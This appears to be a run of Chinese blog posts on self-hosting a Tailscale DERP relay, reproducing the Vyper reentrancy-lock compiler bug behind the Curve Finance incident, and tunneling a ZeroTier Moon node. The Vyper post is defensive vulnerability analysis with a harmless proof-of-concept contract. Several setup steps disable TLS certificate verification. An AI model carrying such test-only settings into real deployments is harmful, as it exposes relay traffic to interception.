点击 /debug，这将会打开一些调试用的数据页面，如果我们再进一步的点击，就可以发现在源代码里经常设置的调试字段。我们可以利用这里的字段来间接判断 DERP/STUN 是否工作正常。

这个非常有用，因为我们可以通过这种方式来确认 DERP 服务和 STUN 服务是可以指定同一个端口并正常工作的（因为两个服务一个使用 TCP 一个使用 UDP）：

nc 上去后初始时 not_stun 值为 5，在发送三行数据后值变为了 8。

那么 Zerotier 那一套操作就可以直接套在 Tailscale DERP 服务器上了（mix-port）。

5. DEBUG 防护

出于安全性的考虑，我们希望在实际部署时关闭掉这个 debug 模式，那该如何操作？

这个实际上已经不需要我们操心，从 tsweb/tsweb.go#L53 中可以看出，它只会为满足几个条件的 debug 请求放行：

请求来源为本地回环 IP、tailscale IP 以及 TS_ALLOW_DEBUG_IP 指定的 IP。
请求不为 GET 方式且携带 debugkey ，同时 debugkey 的内容与 TS_DEBUG_KEY_PATH 所指定文件的内容相同。

// AllowDebugAccess reports whether r should be permitted to access
// various debug endpoints.
func AllowDebugAccess(r *http.Request) bool {
if allowDebugAccessWithKey(r) {
return true
}
if r.Header.Get("X-Forwarded-For") != "" {
// TODO if/when needed. For now, conservative:
return false
}
ipStr, _, err := net.SplitHostPort(r.RemoteAddr)
if err != nil {
return false
}
ip, err := netip.ParseAddr(ipStr)
if err != nil {
return false
}
if tsaddr.IsTailscaleIP(ip) || ip.IsLoopback() || ipStr == envknob.String("TS_ALLOW_DEBUG_IP") {
return true
}
return false
}

func allowDebugAccessWithKey(r *http.Request) bool {
if r.Method != "GET" {
return false
}
urlKey := r.FormValue("debugkey")
keyPath := envknob.String("TS_DEBUG_KEY_PATH")
if urlKey != "" && keyPath != "" {
slurp, err := os.ReadFile(keyPath)
if err == nil && string(bytes.TrimSpace(slurp)) == urlKey {
return true
}
}
return false
}

实际测试如下：

6. 编写 DERP-MAP

在本文章中，为了区分开 DERP 和 STUN 服务的不同，这两个服务暂不指定至相同的端口。

DERP map 的编写可以参考官方: derp-map - tailscale

{
    "Regions": {
      "233": {
        "RegionID": 233,
        "RegionCode": "useless-region-code",
        "Nodes": [
          {
            "Name": "test-derp",
            "RegionID": 233,
            "HostName": "kiprey-derp",
            "IPv4": "127.0.0.1",
            "IPv6": "::1",
            "DERPPort": 8888,
            "STUNPort": 8889,
            "InsecureForTests": true
          }
        ]
      }
    }
  }

注意：1. HostName 填写为先前确定的那一个 DERP_HOST，用于传递给 Server 校验；InsecureForTests 用于让客户端跳过证书校验。

将其保存为 derp-map.json 并运行：

$ ~/go/bin/derpprobe -derp-map file://$HOME/derp-map.json -once
2023/11/12 15:01:38 Waiting for all probes (may take up to 1m)
2023/11/12 15:01:40 adding DERP TLS probe for test-derp ()
2023/11/12 15:01:40 adding DERP UDP probe for test-derp (derp/useless-region-code/test-derp/udp6)
2023/11/12 15:01:40 adding DERP UDP probe for test-derp (derp/useless-region-code/test-derp/udp)
2023/11/12 15:01:40 adding DERP mesh probe for test-derp->test-derp ()
2023/11/12 15:01:41 probe derp/useless-region-code/test-derp/tls: connecting to "kiprey-derp:443": dial tcp: lookup kiprey-derp on 127.0.0.53:53: server misbehaving
2023/11/12 15:01:47 probe derp/useless-region-code/test-derp/test-derp/mesh: derp.Recv: EOF
2023/11/12 15:01:54 good: derp/useless-region-code/test-derp/udp6: 667.205µs
2023/11/12 15:01:54 good: derp/useless-region-code/test-derp/udp: 2.71478ms
2023/11/12 15:01:54 good: derpmap-probe: 5.609009ms
2023/11/12 15:01:54 bad: derp/useless-region-code/test-derp/test-derp/mesh: derp.Recv: EOF
2023/11/12 15:01:54 bad: derp/useless-region-code/test-derp/tls: connecting to "kiprey-derp:443": dial tcp: lookup kiprey-derp on 127.0.0.53:53: server misbehaving

derpprobe 探测内容

先简单说明一下 derpprobe 探测的内容，它主要是探测以下三种功能（功能位于prober/derp.go）：

DERP TLS probe：只探测当前被测 DERP 服务器的 TLS 协议是否能正常建立 TLS 连接，不探测应用层数据（prober/derp.go#L58 & prober/derp.go#L97 & prober/tls.go#L29）。
DERP UDP probe：探测当前被测 DERP 服务器上基于 UDP 的 STUN 服务是否正常（IPv4 & IPv6 各探测一次，会建立连接并收发数据）（prober/derp.go#L113 & prober/derp.go#L206）。
DERP mesh probe：探测当前被测 DERP 服务器与同 Region 下其他 DERP 服务器的数据转发是否正常（prober/derp.go#L122 & prober/derp.go#L139 & prober/derp.go#L295）。

可以看到输出的结果里存在错误，其错误有两点：

TLS 连接失败。阅读源代码发现 DERP TLS probe 连接 DERP 服务器的方式不太正宗，连接逻辑和常规客户端连接 DERP 服务器完全不同，并且只会请求访问配置中的 HostName 字段，而不会使用 IPv4/IPv6 字段(prober/derp.go#L97)，同时还不使用 InsecureForTests 字段来设置关闭证书验证，因此 TLS probe 的错误就无法处理了；不过这个错误也无关紧要。
Prober 连接 DERP 服务失败。DERP 服务一直报如下信息的错误：
1
2023/XX/XX XX:XX:XX derp: 127.0.0.1:50566: client xxxxx rejected: client nodekey:xxxxx not in set of peers
通过调试发现是因为 prober 所使用的 client key 是随机生成的，因此 DERP 在指定 —verify-clients 后会将该 prober 连接阻断，在测试时需要去除 DERP 服务的这个参数，最终效果如下：

简单解释一下 Prober 的使用关键点：

上图中本人在运行 derpprobe 时是直接运行最新源代码，而非通过 go install 预编译二进制文件的形式。这是因为在本人使用 derpprobe 时，刚好 derpprobe 正在修复bug，最新版本的修复代码尚未提交至 go pkg，因此是直接运行的源代码。
使用 Prober 时一定要清除 proxy，否则你就会发现本该连接成功的 HTTPS 请求在一个奇怪的地方被”劫持“，导致 prober 失败：

那么，derpprobe 的测试到此为止，接下来要实际部署进 tailscale 网络中来进行测试。

DERP mesh probe 探测原理

顺带说一下 DERP mesh probe 的探测原理，这个比较有意思，其目的是测试不同 client 连接同一个 Region（Cluster）时的数据转发效果，这里尤其需要考虑不同 client 连接至同一个 Region 但不同 Region Node 时消息的转发状态。其测试过程如下：

为了避免混淆，规定 client1、client2 为非 DERP 服务的两个不同客户端节点；sclient1、sclient2 为 DERP 服务内对应创建的两个结构体，用来和 client1、client2 交互等等。

初始时，prober 会在 derpProbeNodePair 函数里创建出两个分别连接不同 Region 的 client 结构 client1(连接 derp1) 和 client2(derp2)。这两个 client 使用了不同的密钥对，以假装是两个独立 Node 来对不同 DERP 发起连接。
但要知道的是，代码里只是传入了两个处于同一 Region 的不同 RegionNode，那该如何达到连接不同 Region 的目的呢？事实上，prober 会将这些 DERP 节点伪造成来自不同 Region 的节点（prober/derp.go#L364，注意所返回的 DERPRegion 的 Nodes 都是传入的单个节点，RegionID 相同没有影响）。
另一边，远程 DERP 服务会在收到 client 的连接请求后，调用 registerClient 函数：
1. 在 DERP 服务本地维护一个结构体 sclient，保存每个 client 连接的状态以及尚未发出的信息。
  DERP 这里一个 sclient 结构配对 Client 端的一个 derphttp.Client。
2. 向正在 watch 本 DERP 服务连接状态的其他 DERP Client 广播该 client 的上线情况（例如是否上线、远程 IP 地址信息等等，broadcastPeerStateChangeLocked 函数）
接下来，prober 会令 client1 发送随机 8 字节数据给 client2，并期望能从 client2 中接收到相同的数据。数据的实际流向应该是 client1 → derp1 → derp2 → client2。具体来说：
1. prober 在令 client1 发送数据时，client1 会调用 derp_client.Send 函数，在这个 data 前包裹上 frameSendPacket 枚举和 client2 的 dstKey 目的地址，使得构成一个 Frame packet。
2. 这个 Frame packet 将会被 client1 先发送给 derp1（因为 client1 不了解 client2 的地址）
3. derp1 在接收到 Frame Packet 后，会进入 handleFrameSendPacket 函数进行处理。
  1. 假如 client1 和 client2 连接的是同一个 Region（即 derp1 和 derp2 是同一个，只是逻辑上我们将它们分开来），那么 derp1 事实上是拥有 client2 在 derp1 这里所对应的 sclient2 结构体，则 derp1 会直接发送 raw packet 给 sclient2。
    该 raw packet 里会附带上传入数据的原始来源节点的 key（实际上就是每个节点所持有的公钥），相当于是把数据来源方的 ID 保存在了 raw packet 里。
    sclient2 在接收到这个 raw packet 后会生成 frameRecvPacket 给 client2。如此 client2 便可以调用 Recv 函数来获取其他节点发送给 client2 的数据。
  2. 假如 client1 和 client2 连接的是独立的 Region，那么由于 derp1 也不知道 client2 的具体地址，它就会去获取知道 client2 地址的 fowarder 句柄（在这里是一个连接着 derp2 的 sclient 结构体）。通过该 fowwarder 句柄将消息从 derp1 传输给 derp2，并由 derp2 来将消息传递给 sclient2，并最终发送给 client2。
    forward 操作只会执行一次，不会执行第二次。
    那么 derp1 是怎么知道要找 client2 得先找 derp2 呢？这就跟上面 2.b 提到的 client 状态广播机制有关。在启动 derp 服务时，参数中可以指定其他多个处于同一个 region Node 的 mesh 节点，derp 服务会依次向这些 mesh 内的 derp 节点发起连接，并 watch 这些节点的 client 连接状态，以维护 derp 服务的 fwd 状态。
    不过这些就太细节了，没什么必要追究的了。

五、Tailscale 调试环境搭建

如果需要单步调试相关逻辑的话，需要手动 git clone tailscale 仓库至本地来调试，不能直接用 ~/go/pkg/mod/tailscale.com@v1.50.1 底下的，因为这里的文件夹没有写权限。

本人使用的 VSCode launch.json 如下，注意 program 一栏只能指定到文件夹，不能指定到具体的 go 代码，因为这会让调试器无法找到多文件项目中其他 go 代码，导致符号缺失：

{
    // 使用 IntelliSense 了解相关属性。 
    // 悬停以查看现有属性的描述。
    // 欲了解更多信息，请访问: https://go.microsoft.com/fwlink/?linkid=830387
    "version": "0.2.0",
    "configurations": [
        {
            "name": "Launch derpprobe",
            "type": "go",
            "request": "launch",
            "mode": "auto",
            "program": "cmd/derpprobe",
            "args": [
                "-derp-map", "file:///home/kiprey/derp-map.json",
                "-once"
            ],
            "cwd": "${workspaceFolder}",
            "env": {
                // 去除代理设置
                "ALL_PROXY": null, "all_proxy": null,
                "HTTP_PROXY": null, "http_proxy": null,
                "HTTPS_PROXY": null, "https_proxy": null,
            }
        },
        {
            "name": "Launch derp",
            "type": "go",
            "request": "launch",
            "mode": "auto",
            "program": "cmd/derper",
            "args": [
                "-c", "/home/kiprey/.derper.key",
                "-a", ":8888", "-stun-port", "8889", 
                "-http-port", "-1",

                "-hostname", "kiprey-derp",
                "--certmode", "manual",
                "-certdir", "./certdir",
            ],
            "cwd": "${workspaceFolder}",
        }
    ]
}

六、DERP 搭建总结演示

这一节我将整合上面的所有内容，从头到尾以最短篇幅描述搭建一个 DERP 服务器的操作流程。

重申：当前使用的 tailscale 版本为 v1.52.1 (2023/11/11)，git commit 为 86c8ab75.

这里重点说明一下 tailscale 版本，因为 Tailscale 迭代升级速度很快，可能一两年后该文章就不再适用了（捂脸）

1. 前置条件

只有一个要求，那就是一个允许通过 TLS 流量的 TCP 协议的公共信道以及一个 UDP 协议的公共信道。

无需域名、无需 TLS 证书、无需修改任何源代码、也无需自行部署 Headscale 等等，找个内网穿透服务就能建。

这里说的比较抽象，实际上就是要么是一个 TCP 端口和一个 UDP 端口，要么就是一个端口同时允许 TCP 和 UDP 通信（mix-port）。如果不想运行 stun 服务只想搭建 derp 中转服务的话，则无需 UDP 端口。

但无论如何，TCP 端口都 不得限制 TLS 流量的通过，通常这种限制会来自于运营商（例如家用公网 IP 部署）或者内网穿透服务商（服务商要对穿透内容负责，因此可能需要实名认证等方式才能放行用户的 TLS 流量）。

2. 安装 DERP

以下所有命令全部在 DERP 服务器上运行。

# 去 https://go.dev/dl/ 下载最新版（一定要下载版本，而非 apt-get install golang）
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go && sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
rm go1.21.4.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

# 确定安装是否g成功 
go version
# 查看 GOROOT 和 GOPATH 是否不为空 & 可访问
go env

# 配置 go 代理并安装
go env -w GOPROXY=https://goproxy.cn,direct
go install tailscale.com/cmd/derper@latest
# 安装 derp probe 协助测试 derper
go install tailscale.com/cmd/derpprobe@latest

3. 启动 DERP

配置端口暴露至公网。这一步既可以通过内网穿透完成，也可以配置已有暴露至公网的机器的 iptables 策略：

请注意：iptables 策略有优先级之分，一定要插到 DROP all 之前。

# 配置 TCP 入站，将允许 dest-port 为 8888 的 TCP 连接规则插入 iptables 中的第 10 条
sudo iptables -I INPUT 10 -p tcp --dport 8888 -j ACCEPT
# 配置 UDP 入站，将允许 dest-port 为 8889 的 UDP 连接规则插入 iptables 中的第 10 条
sudo iptables -I INPUT 10 -p udp --dport 8889 -j ACCEPT

# --------------
# 查看 iptables
$ sudo iptables -L -n
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     icmp --  0.0.0.0/0            0.0.0.0/0
...
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:8889
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:8888
DROP       all  --  0.0.0.0/0            0.0.0.0/0

接下来，配置并启动 DERP 服务。

# 指定 DERP_HOST 为 kiprey-derp（后面会用）
DERP_HOST="kiprey-derp"
DERP_PORT=8888
STUN_PORT=8889

# 创建自签名证书
mkdir ~/certdir && cd ~/certdir
openssl genpkey -algorithm RSA -out ${DERP_HOST}.key   
openssl req -new -key ${DERP_HOST}.key -out ${DERP_HOST}.csr
openssl x509 -req \
-days 36500 \
-in ${DERP_HOST}.csr \
-signkey ${DERP_HOST}.key \
-out ${DERP_HOST}.crt \
-extfile <(printf "subjectAltName=DNS:${DERP_HOST}")

# 启动 DERP 服务（中继和stun）
# --verify-clients 需要本地运行 tailscaled，我在这里省略了安装 tailscale 的步骤
~/go/bin/derper \
    -c ~/.derper.key \
    -a :${DERP_PORT} -http-port -1 \
    -stun-port ${STUN_PORT} \
    -hostname ${DERP_HOST} \
    --certmode manual \
    -certdir ~/certdir \
    --verify-clients

启动 DERP 服务后，在另一台机器上做连通性测试：

# 这里的 DERP_HOST 要与 DERP 服务上的一致
DERP_HOST="kiprey-derp"

# 以下是 DERP 服务的公网视角，即如何从公网连接其地址和端口。
# 如果存在端口转发，则这里的端口会和上面 DERP 服务本地监听的端口不同，请自行配置
DERP_PUB_IP="a.b.c.d"
DERP_PUB_PORT=8888
STUN_PUB_PORT=8889

$ unset all_proxy http_proxy https_proxy
$ curl --insecure --resolve "${DERP_HOST}:${DERP_PUB_PORT}:${DERP_PUB_IP}" "https://${DERP_HOST}:${DERP_PUB_PORT}"


DERP

  This is a
  "https://tailscale.com/">Tailscale
  "https://pkg.go.dev/tailscale.com/derp">DERP
  server.


# 测试 UDP 协议 STUN 服务的连通性
$ nc ${DERP_PUB_IP} ${STUN_PUB_PORT} -v -u

Connection to a.b.c.d e port [udp/*] succeeded!

连通性测试通过后，DERP 服务器上先关闭 derp 服务，创建 service 来让它开机自启：

DERP_HOST="kiprey-derp"
DERP_PORT=8888
STUN_PORT=8889

# 创建service文件
echo "[Unit]
Description=Tailscale derp service
After=network.target

[Service]
ExecStart=/home/${USER}/go/bin/derper \
    -c /home/${USER}/.derper.key \
    -a :${DERP_PORT} -http-port -1 \
    -stun-port ${STUN_PORT} \
    -hostname ${DERP_HOST} \
    --certmode manual \
    -certdir /home/${USER}/certdir \
    --verify-clients
Restart=always
User=${USER}

[Install]
WantedBy=multi-user.target" \
| sudo tee /etc/systemd/system/tailscale-derp.service

# 重新加载Systemd配置
sudo systemctl daemon-reload

# 启动服务并设置开机自启动
sudo systemctl start tailscale-derp
sudo systemctl enable tailscale-derp

# 查看服务状态，没问题就行
# 如果有问题那就得看看是不是之前的 derper 忘记关了，导致端口占用
sudo systemctl status tailscale-derp

# -------------------
# 如需禁用
sudo systemctl stop tailscale-derp
sudo systemctl disable tailscale-derp

到这里后，DERP 服务配置完成。

4. 配置 ACL

接下来要去 Tailscale admin panel 网页，配置一下 ACL 以更新所有 tailscale 节点的配置信息。

...
{
...
"acls": [...],
...
"ssh": [...],
  ...
"derpMap": {
"Regions": {
"900": {
"RegionID":   900,
"RegionCode": "MyDerp",
"Nodes": [
{
"Name":             "MyDerp-Name",
"RegionID":         900,
"HostName":         "kiprey-derp",
"IPv4":             "a.b.c.d",
"DERPPort":         8888,
"STUNPort":         8889,
"InsecureForTests": true,
},
],
},
},
},
  ...
}

5. 演示

在网页上保存好 ACL 后，ACL 会立即下发到各个 tailscale 节点里。随便找个节点运行 netcheck，可以发现 DERP 成功添加：

七、参考链接

DERP Servers - Tailscale Documentation
Tailscale 基础教程：部署私有 DERP 中继服务器 - 云原生
Custom DERP Servers - Tailscale Documentation
p2p的原理和常见的实现方式 - cppblog
How NAT traversal works NAT - Tailscale Blog
上文中的各类代码和其他较为琐碎而没记录与此处的各类 blog

Curve Finance 漏洞复现

2023-08-09T16:00:00.000Z

一、简介

智能合约在区块链的世界中较为重要。本文记录了笔者在复现 Python 智能合约编译器 Vyper 中的一个编译漏洞，该漏洞导致智能合约中的重入锁变得无效，进而使得合约易受重入攻击。

二、环境搭建

1. Vyper 构建

下载 Vyper 编译器源代码并通过 pip 安装依赖。

git clone git@github.com:vyperlang/vyper.git
cd vyper

# 依赖来自 setup.py & requirements-docs.txt，不可直接照搬
pip3 install "asttokens>=2.0.5,<3" "pycryptodome>=3.5.1,<4" "semantic-version>=2.10,<3" "importlib-metadata" "wheel" "sphinx==4.5.0" "recommonmark==0.6.0" "sphinx_rtd_theme==0.5.2"

运行 python3 -m vyper --help，能正常输出帮助信息即可：

$ python3 -m vyper --help
usage: __main__.py [-h] [--version] [--show-gas-estimates] [-f FORMAT] [--storage-layout-file STORAGE_LAYOUT [STORAGE_LAYOUT ...]]
                   [--evm-version {istanbul,berlin,london,paris,shanghai,cancun}] [--no-optimize] [--optimize {gas,codesize,none}] [--debug] [--no-bytecode-metadata]
                   [--traceback-limit TRACEBACK_LIMIT] [--verbose] [--standard-json] [--hex-ir] [-p ROOT_FOLDER] [-o OUTPUT_PATH]
                   input_files [input_files ...]

Pythonic Smart Contract Language for the EVM

positional arguments:
  input_files           Vyper sourcecode to compile

options:
  -h, --help            show this help message and exit
  --version             show program's version number and exit
  ...

最后切换到漏洞引入点：

1 2	# https://github.com/vyperlang/vyper/commit/a09cdddd8ba249d1ce68ac31ec4496e50b8a25c7 git checkout a09cdddd

如果想要单步调试跟进，那就需要：

1
2
3

# 在 vyper 项目根目录下
cp ./vyper/__main__.py vyper.py
python3 vyper.py --help

2. 合约下载

合约的代码可以在链上合约地址处找到，例如 https://bscscan.com/address/0x245a45cdf2271d026976811a80c091fe5b49ac40#code

合约是开源的，肯定有不止一种找到合约源代码的方式，上面也只是举例演示一下。

三、漏洞根因

1. 安全的重入锁状态维护逻辑

在讲解漏洞根因之前，我们先来简单了解一下在引入漏洞 commit 之前，关于重入锁的状态维护逻辑。

对于重入锁来说，自然是需要在 Storage 上有一个 slot 用来存放锁的状态。也就是 get_nonreentrant_lock 函数做的事情：

# 引入漏洞 commit 前
def get_nonreentrant_lock(func_type, global_ctx):
    nonreentrant_pre = [["pass"]]
    nonreentrant_post = [["pass"]]
    if func_type.nonreentrant:
        nkey = global_ctx.get_nonrentrant_counter(func_type.nonreentrant)
        nonreentrant_pre = [["seq", ["assert", ["iszero", ["sload", nkey]]], ["sstore", nkey, 1]]]
        nonreentrant_post = [["sstore", nkey, 0]]
    return nonreentrant_pre, nonreentrant_post

从代码中可以看到，当某个函数被标记为禁止重入时，vyper 会在需要用到重入锁的合约逻辑时，编译生成以上一系列的 IR。这些 IR 做的事情很简单，获取锁时检查锁是否为 0 && 将锁状态设置为 1；释放锁时重设锁状态为 0。

而存放锁状态的 slot 是通过 global_ctx.get_nonrentrant_counter 函数所得，也就是那个在漏洞 commit 里被标记为 dead code 的函数，该函数会根据传入的 key 来确定要用哪个 slot 来存放锁状态：

def get_nonrentrant_counter(self, key):
    """
    Nonrentrant locks use a prefix with a counter to minimise deployment cost of a contract.

    We're able to set the initial re-entrant counter using the sum of the sizes
    of all the storage slots because all storage slots are allocated while parsing
    the module-scope, and re-entrancy locks aren't allocated until later when parsing
    individual function scopes. This relies on the deprecated _globals attribute
    because the new way of doing things (set_data_positions) doesn't expose the
    next unallocated storage location.
    """
    if key in self._nonrentrant_keys:
        return self._nonrentrant_keys[key]
    else:
        counter = (
            sum(v.size for v in self._globals.values() if not isinstance(v.typ, MappingType))
            + self._nonrentrant_counter
        )
        self._nonrentrant_keys[key] = counter
        self._nonrentrant_counter += 1
        return counter

而在函数重入中，这个 key 值是 vyper 脚本中的那个字符串，例如以下代码中的 lock 字符串，它用于区分开不同的重入锁：

@external
@nonreentrant('lock')
def add_liquidity() -> uint256:
    return 0

@external
@nonreentrant('lock')
def exchange() -> uint256:
   return 0

总结一句话，在引入漏洞 commit 之前，vyper 使用脚本里重入锁的字符串来区分开不同的重入锁，而区分的方式是根据字符串来选择用于存放重入锁状态的 slot 位置。这样一来，倘若不同函数使用了相同名称的重入锁，则这些重入锁将会使用同一个 slot，来抵御重入攻击。

2. 带有漏洞的重入锁状态维护逻辑

引入漏洞前，vyper 用于存放重入锁状态的各个 slot 是直接追加在全局变量分配存储的末尾：

def get_nonrentrant_counter(self, key):
    if key in self._nonrentrant_keys:
        return self._nonrentrant_keys[key]
    else:
        # 注意这里的 counter 是怎么计算得出的
        counter = (
            sum(v.size for v in self._globals.values() if not isinstance(v.typ, MappingType))
            + self._nonrentrant_counter
        )
        self._nonrentrant_keys[key] = counter
        self._nonrentrant_counter += 1
        return counter

漏洞 commit 尝试将重入锁的状态变量与其他全局变量的分配合并掉，即在解析 vyper AST 阶段时就一并做掉重入锁的 slot 分配，而非在后续生成 IR 阶段时再去动态生成和指定重入锁的 slot 位置。因此 global_ctx.get_nonrentrant_counter 这个用来动态生成重入锁 slot 位置的函数就不再被调用了，被开发者标记为 dead code。而指定重入锁位置的重任则交付到了 set_storage_slots 函数上，该函数在 AST 解析阶段执行，其先前的作用只是用来指定各个变量存储的 slot 位置。

从这里我们可以看到，在漏洞 commit 里 vyper 是怎么指定各个函数的重入锁所在 slot 呢？没错，它每个函数分配一个重入锁 slot，也就是说对于不同函数的同名重入锁而言，这些重入锁相互之间不会阻止重入。

3. 漏洞演示

以下是一个关于该 vyper 重入漏洞的 POC：

@external
@nonreentrant('lock')
def add_liquidity() -> uint256:
    return 0

@external
@nonreentrant('lock')
def exchange() -> uint256:
   return 0

这个 POC 的逻辑很简单，它声明了两个不同的函数，但这两个函数使用了相同名称的重入锁。我们来输出它的 IR 看看：

输出 IR 命令：python3 vyper.py -f ir

$ python3 vyper.py -f ir vyper_workdir/test.vy
[seq,
  [return,
    0,
    [lll,
      [seq,
        [if, [lt, calldatasize, 4], [goto, fallback]],
        [mstore, 28, [calldataload, 0]],
        [with,
          _func_sig,
          [mload, 0],
          [seq,
            [assert, [iszero, callvalue]],
            # Line 3
            [if,
              [eq, _func_sig, 3964006281 ],
              [seq,
                [assert, [iszero, [sload, 0]]],    # 检查重入锁状态
                [sstore, 0 /*slot*/, 1 /*val*/],   # 获取重入锁
                pass,
                # Line 4
                [mstore, 0, 0],
                [seq_unchecked, [sstore, 0, 0], [return, 0, 32]],
                # Line 3
                [sstore, 0, 0],                    # 释放重入锁
                stop]],
            # Line 8
            [if,
              [eq, _func_sig, 3539412570 ],
              [seq,
                [assert, [iszero, [sload, 1]]],    # 检查重入锁状态
                [sstore, 1, 1],                    # 获取重入锁
                pass,
                # Line 9
                [mstore, 0, 0],
                [seq_unchecked, [sstore, 1, 0], [return, 0, 32]],
                # Line 8
                [sstore, 1, 0],                    # 释放重入锁
                stop]]]],
        [seq_unchecked, [label, fallback], /* Default function */ [revert, 0, 0]]],
      0]]]

可以看到那两对 sstore 指令使用的 slot 不是同一个，第一个函数使用了 slot0，而第二个函数使用了 slot1。

4. 漏洞修复

漏洞补丁很简单，只允许在出现不同名的重入锁时才使用新的 slot：

使用 Frpc 进行内网穿透构建 ZeroTier Moon 记录

2023-05-16T16:00:00.000Z

一、简介

Zerotier 是一个专用于异地组网的工具，它方便将多台异地机器以 P2P 或者中转 Relay 的方式实现宛如局域网般的流畅体验。

Zerotier 组网中节点分为三个部分，分别是位于国外的中央服务器 Planet，用户自建节点 Moon，以及用户其他节点 Leaf。

由于 Planet 位于国外，当两台机器地理位置相隔甚远时，无论是 UDP 打洞还是 Relay 中继，速度都非常慢，因此尝试自建一台国内Zerotier Moon 来提高打洞概率 + 中继速度。

网上搭建 Zerotier Moon 的教程都需要购买一台服务器，但本人不想这么折腾，因此尝试探索 FRPC 内网穿透的搭建方式。

二、Zerotier 打洞/中继

在做内网穿透/搭建 Moon 之前，我们得先理解 Zerotier 的打洞和中继原理。

本节参考：ZeroTierOne/service/OneService.cpp - github，以及自己花费大量时间调试 + wireshark 抓包的痛苦经验。

1. 监听状态

Zerotier 会在本地同时使用 3 个端口，其中每个端口都会分别监听 TCP 和 UDP 连接。以下是 Zerotier 在我本机上的监听：

➜  zerotier-one sudo lsof -i -P -n | grep zerotier
zerotier- 2091716    zerotier-one    6u  IPv4 868501026      0t0  TCP 127.0.0.1:9993 (LISTEN)
zerotier- 2091716    zerotier-one    7u  IPv6 868501027      0t0  TCP [::1]:9993 (LISTEN)

zerotier- 2091716    zerotier-one   16u  IPv4 868501047      0t0  UDP 192.168.51.236:9993
zerotier- 2091716    zerotier-one   17u  IPv4 868501048      0t0  TCP 192.168.51.236:9993 (LISTEN)

zerotier- 2091716    zerotier-one   14u  IPv4 868501045      0t0  UDP 192.168.51.236:30978
zerotier- 2091716    zerotier-one   15u  IPv4 868501046      0t0  TCP 192.168.51.236:30978 (LISTEN)

zerotier- 2091716    zerotier-one   18u  IPv4 868501049      0t0  UDP 192.168.51.236:42276
zerotier- 2091716    zerotier-one   19u  IPv4 868501050      0t0  TCP 192.168.51.236:42276 (LISTEN)

# ... 略去剩余 IPv6 监听信息

2. 三个端口

先讲端口，这三个端口分别为首选端口、次选端口和末选端口，这三个端口的定义如注释所描述的那样：

// ref: https://github.com/zerotier/ZeroTierOne/blob/adfbbc3/service/OneService.cpp#L802

/*
* To attempt to handle NAT/gateway craziness we use three local UDP ports:
*
* [0] is the normal/default port, usually 9993
* [1] is a port derived from our ZeroTier address
* [2] is a port computed from the normal/default for use with uPnP/NAT-PMP mappings
*
* [2] exists because on some gateways trying to do regular NAT-t interferes
* destructively with uPnP port mapping behavior in very weird buggy ways.
* It's only used if uPnP/NAT-PMP is enabled in this build.
*/

其中首选端口默认固定为 9993（默认端口可被修改，参阅ZeroTier One Network Virtualization Service Documentation）。

我在网上看搭建 Moon 的教程中有看到过设置 9995 端口的，不看源码是真容易搞不清楚哪个端口更重要。
现在明确一点，Zerotier 默认情况下不涉及 9995 端口，只涉及到 9993 端口。

当 host 尝试连接 peer 时，这三个端口会同时发送 UDP 数据至 peer。

上下文中 host 指代本机，尽管 p2p 是去中心化的，但是为了便于说明还是要区分本机和远程对等机。

peer 在接收到数据后，对应端口会立即朝着源地址返回一个 UDP 包打洞。倘若 host 接收到 peer 返回的三个 UDP 包的任意一个，则视为可被 DIRECT ACCESS，即 P2P 打洞成功。host 和 peer 会定期发送心跳包维护 p2p 洞，此时数据传递所使用的端口即 host 成功接收到的 peer 包的那个端口。

在抓包时，经常看见 host 发三个 udp 给 Peer（注意一共有三个端口，一个端口发一个），而最后只能从 peer 那边接收到一个 UDP 包。

使用 zerotier-cli peers 命令可以查看本机与其他 peer 的连接是 DIRECT(p2p) 还是 relay（中继），只有这两种连接状态。

该命令需要 sudo/管理员权限。

我们同时还可以看到 Zerotier 会监听这三个端口的 TCP 协议数据。这里的 TCP 协议数据与打洞/peers沟通无关，它实际上使用的是 Http 协议，主要用来与本地的 zerotier-cli 进行交互，例如：

➜  zerotier-one echo "GET /info HTTP/1.1\r\nX-ZT1-Auth: $(sudo cat /var/lib/zerotier-one/authtoken.secret)\r\n\r\n" | nc 127.0.0.1 9993 -v
Connection to 127.0.0.1 9993 port [tcp/*] succeeded!
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Content-Length: 91
Connection: close

{
        "controller": true,
        "apiVersion": 4,
        "clock": 1684295560845,
        "databaseReady": true
}

这里我只测试成功过 127.0.0.1:9993 的 TCP 连接，其他监听端口/监听地址的组合我都无法用 nc 测试成功过，暂不了解具体原因。

具体其他的 HTTP 请求选项可以参考 Network Virtualization Service API 来理解，这里不再赘述。

3. 中继

当 host 和 peer 没法 p2p 直连时，Zerotier 会尝试使用中继手段，相关逻辑位于 nodeWirePacketSendFunction 函数中。

中继也分为两种，一种是 TCP 中继，一种是 UDP 中继：

UDP 中继。UDP中继是 Zerotier 的主流中继实现方式，它会寻找 Moon/Planet 并要求他们来为待发送的数据包进行 UDP 中继，因此无论是 host 还是 peer，中继发送/接收的数据全部都是 UDP 数据，逻辑比较简单。
TCP 中继。 Zerotier 认为 TCP 中继开销太大，因此只在极端恶劣的情况下（例如UDP中继完全失败，即所有UDP数据包全被网关过滤或者超时非常严重等情况，）才会使用 TCP 中继，但事实上这种恶劣情况概率极小，所以可以等同于 Zerotier 基本上不使用 TCP 中继。
Zerotier 只有在 60s 没有接收到任何数据时才能进行 TCP中继，这个时间相当的长，相信大多情况下应该都不会触发这个条件。

用户可以根据 ZeroTier TCP Proxy Server Documentation 配置 local.conf 来指定是否强制使用 TCP 中继。在启用强制TCP中继后，UDP中继功能将不再启用。虽然 Zerotier 认为 TCP 中继会比 UDP 中继慢，但事实上我用 ping 测试发现 TCP 中继节点比 UDP 中继节点距离我更近一点，延迟更小，因此 Zerotier 的这个说法仁者见仁智者见智，需要理论联系实际。

三、Frpc 内网穿透

1. 做法

Frpc 用来穿透 Moon 服务器的 9993 UDP 端口。

这里本人用的是 NatFrp，这个真的相当良心，免费版每月 5Gb/10Mbps/2tunnel，基本满足绝大多数的需求。

